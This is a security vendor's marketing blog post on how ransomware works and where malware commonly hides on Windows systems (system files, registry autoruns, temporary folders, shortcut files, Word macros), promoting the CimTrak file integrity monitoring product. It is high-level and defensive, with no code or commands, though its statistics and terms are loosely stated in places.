While many cybercriminals execute data breaches and attacks in a matter of hours or less, others prefer a long-haul approach to harvesting sensitive and protected information over time. The recent surge in social engineering and advanced persistent threats (APTs), ransomware, and other sophisticated cybercrime is an indicator that unknown viruses and ransomware are definitely means to an end — either for financial gain or disruption of services of targeted organizations.

In 2021, 37 percent of all businesses and organizations were hit by ransomware attackers. Of those businesses, 32 percent paid the ransom, but only 65 percent got their data back, according to a recent Sophos report (The State of Ransomware 2021). The latest security threats are characterized by their ability to remain undetected for long periods on a company's network. In some cases, criminals have gone unnoticed for years. Ponemon’s 2021 report highlighted that it takes 212 on average for a security breach or incident to be detected and another 75 days to contain.

How Does Ransomware Work?

In order to understand how to solve the problem of ransomware, we must first understand how it works. Ransomware can be explained in four stages. Stages 1 and 2 are where the APT is initiated and executed. 

Ransomware Stages

For years, Stage 1 has been unsuccessful at keeping out the bad guys from an intrusion perspective. Highlighted as one of three core principals in the NIST 800-207 Zero Trust Architecture, organizations should assume at all times that there is a malicious presence inside their environment. Given this assumption, when a malicious actor is present on a network, they can really only do one of two things…

  1. They can snoop around and try to exfiltrate data, or
  2. They can add, modify or delete system files, directories, configurations, policies, users, etc… 

Spoiler alert — ransomware is simply a software package or payload that must first be “added” to an infrastructure and then “executed.” It’s the execution of the payload that encrypts critical files to the point that they are unreadable and/or impacts the operational stability of the target systems.

Malware vs Ransomware

Ransomware is essentially a form of malware. Other types of malware consist of Trojans, Spyware, Adware, Rootkits, Worms, and keyloggers. Each type of malware has a nefarious purpose with the intention of gaining access to privileged information, disrupting IT operations, or simply denying access by encrypting files and demanding a ransom in exchange for the encryption key to restore access. But be warned — don’t be a part of that 32 percent that pay the ransom and don’t get a key, or the key doesn’t restore everything back to the original state.

Cybersecurity experts need to be prepared for continued efforts by bad actors looking to reap financial gains by using ransomware as the preferred malware of choice. Join us as we review where APTs, ransomware, and other sophisticated malware can hide in your network and how to be prepared to protect your organization.



Where Malware and Ransomware May Hide

1. Critical System Files

One of the most dangerous and innocuous spots highly sophisticated malware can hide is your critical system files. Traditionally, many malware files that were used to replace or modify existing critical system files were distinguished by a foreign signature or metadata that is visible in the attribute certifiable field (ACT) of signed files.

While file stenography practices used by highly sophisticated cybercriminals can bypass most traditional methods of detection, there are some traces left behind. With technology that can detect changes in file size or contents in addition to signature changes, it's possible to detect these negative changes.

2. Windows Registry

Some malware will modify Windows Registry keys to establish a position among "autoruns" or ensure the malware launches each time an OS is launched. Red Canary’s Andy Rothman discussed that it is becoming increasingly common that a majority of bad actors use registry keys to store and hide next-step code for malware after it has been dropped in a system.

One of the difficulties in manually auditing your Windows registry keys to detect abnormalities can be a massive undertaking. It would theoretically require the comparison of log files to the tens of thousands of autorun settings. While there are some possible shortcuts, efficiently determining modifications to your registry keys is typically best achieved with an effective file integrity monitoring solution.

3. Temporary Folders

Operating systems contain a host of temporary folders, which range from internet caches to application data. These files are an inherent part of the OS, allowing the system to process and compress information to support the user experience. By nature, these temporary folders are typically defaulted, writeable for all users to enable internet browsing, the creation of Excel spreadsheets, and other common activities.

Due to the inherently loose security of these temporary folders, it's a common landing place for malware and ransomware as soon as criminals gain entry to your system via phishing, a rootkit exploit, or another method. Ransomware and malware may use temporary folders as a launchpad to immediately execute, or establish various other strongholds within a company's network through permission elevation and other modes.

4. .Ink Files

Also known as "shortcuts", may contain a direct path to a malware or ransomware-laden website or, more dangerously, an executable file. Chances are, your employees have quite a few of these pathways on their desktops to ease access to commonly visited web applications and other tools.

Both malware and ransomware can gain hold within a system after download with cleverly-disguised .lnk files that may resemble an existing shortcut or even an innocuous PDF document. Unfortunately, the average end-user cannot tell the difference since the .lnk aspect of the file isn't visibly displayed.

5. Word Files

Even relatively low-grade spam filters are wise enough to recognize .exe files as potentially malicious. However, cybercriminals have wised up to this practice and are now taking advantage of Microsoft Office VBAs to insert ransomware code within Word document macros, according to KnowBe4. This particular flavor of "locky ransomware" immediately enters temporary files and executes a lock on data and ransomware demands.

Protecting Your Organization Against the Sneakiest Malware and Ransomware

Over the past two decades, organizations have protected themselves by utilizing endpoint security/protection or anti-virus technologies that use denylisting capabilities. This approach has proven to be reactive and ineffective as it cannot identify or prevent 550k of the 1 million variations of malware released per day. 

So what’s the alternative? The alternative is to address the problem — not the symptom. The symptom has always been the primary focus; business disruption through security attacks or breaches and implementing an Incident Response Plan (IRP), Disaster Recovery Plan (DRP), and a Business Continuity Plan (BCP) to revert back to a state of operation that was prior to infection. While this has its benefits, these traditional solutions use a backup and reprovisioning process that can take hours and days to achieve and even then, data and transactions can and will be lost.

Addressing the Problem

If we are to assume there is virtually no way to prevent 100% of Stage 1 intrusions, then Stage 2 is where the solution lies.

Today's security landscape demands smarter, more efficient solutions to monitor all aspects of your files, beyond signatures and surface appearances. With the help of CimTrak, security personnel gains the ability to understand malicious changes to Windows Registry keys, critical system file contents, and other key hiding places the moment they occur. Not only can you achieve total oversight and control, but you can also fully remediate changes from the administrative console. This can be done manually or automatically, to the last known and trusted baseline of operation. CimTrak’s detection and response measures in seconds.

To learn more about CimTrak's advanced protection against all forms of malware and ransomware, download our report, Defending Against Ransomware with System Integrity Assurance today.


Lauren Yacono
Post by Lauren Yacono
February 7, 2023
Lauren is an IU graduate and Chicagoland-based Marketing Specialist.

About Cimcor

Cimcor’s File Integrity Monitoring solution, CimTrak, helps enterprise IT and security teams secure critical assets and simplify compliance. Easily identify, prohibit, and remediate unknown or unauthorized changes in real-time